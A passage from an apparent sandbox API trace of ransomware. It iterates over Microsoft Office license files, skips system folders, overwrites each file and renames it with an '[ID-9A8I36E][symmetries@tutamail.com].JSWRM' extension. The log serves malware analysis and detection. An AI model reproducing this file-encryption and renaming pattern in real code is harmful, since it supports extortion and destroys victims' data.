lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0107.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0107.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0107.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0107.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0107.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0107.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0107.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0107.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0107.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.386] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11637) returned 1 [0107.386] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0107.386] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0107.388] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.388] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0107.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.388] CloseHandle (hObject=0x45c) returned 1 [0107.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0107.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0107.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0107.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0107.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0107.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0107.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.389] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0107.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0107.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0107.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.390] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8b1d316, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8b1d316, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8bb5c78, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4e0e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="PRC75C~1.XRM")) returned 1 [0107.390] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0107.390] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0107.390] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0107.390] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0107.390] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0107.390] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0107.390] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0107.390] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.390] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0107.390] lstrcmpiW (lpString1="ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0107.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0107.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0107.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d0a0, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0107.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0107.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0107.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0107.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0107.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0107.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0107.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0107.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0107.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.391] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19982) returned 1 [0107.391] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e00) returned 0x24c1d0 [0107.391] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4e00, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4e00, lpOverlapped=0x0) returned 1 [0107.395] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.395] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4e00, lpOverlapped=0x0) returned 1 [0107.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.396] CloseHandle (hObject=0x45c) returned 1 [0107.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0107.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0107.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0107.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0107.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0107.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0107.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.396] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalpipcr_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0107.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0107.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0107.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.397] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8ad0e5c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8ad0e5c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8b697bd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a20, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalR_Grace-ppd.xrm-ms", cAlternateFileName="PRA5ED~1.XRM")) returned 1 [0107.397] lstrcmpiW (lpString1="ProfessionalR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0107.397] lstrcmpiW (lpString1="ProfessionalR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0107.397] lstrcmpiW (lpString1="ProfessionalR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0107.397] lstrcmpiW (lpString1="ProfessionalR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0107.397] lstrcmpiW (lpString1="ProfessionalR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.397] lstrcmpiW (lpString1="ProfessionalR_Grace-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.397] lstrcmpiW (lpString1="ProfessionalR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.397] lstrcmpiW (lpString1="ProfessionalR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.397] lstrcmpiW (lpString1="ProfessionalR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.397] lstrcmpiW (lpString1="ProfessionalR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0107.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0107.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0107.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241330, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0107.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0107.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0107.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0107.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0107.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240ef8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0107.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0107.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0107.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0107.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0107.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.398] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23072) returned 1 [0107.398] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a20) returned 0x24c1d0 [0107.398] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5a20, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5a20, lpOverlapped=0x0) returned 1 [0107.401] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.401] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5a20, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5a20, lpOverlapped=0x0) returned 1 [0107.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.401] CloseHandle (hObject=0x45c) returned 1 [0107.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0107.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0107.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0107.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0107.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0107.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0107.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.402] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0107.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0107.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0107.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0107.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0107.403] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8aaac09, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8aaac09, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8c9aa9a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalR_Grace-ul-oob.xrm-ms", cAlternateFileName="PR7C51~1.XRM")) returned 1 [0107.403] lstrcmpiW (lpString1="ProfessionalR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.403] lstrcmpiW (lpString1="ProfessionalR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.403] lstrcmpiW (lpString1="ProfessionalR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.403] lstrcmpiW (lpString1="ProfessionalR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.403] lstrcmpiW 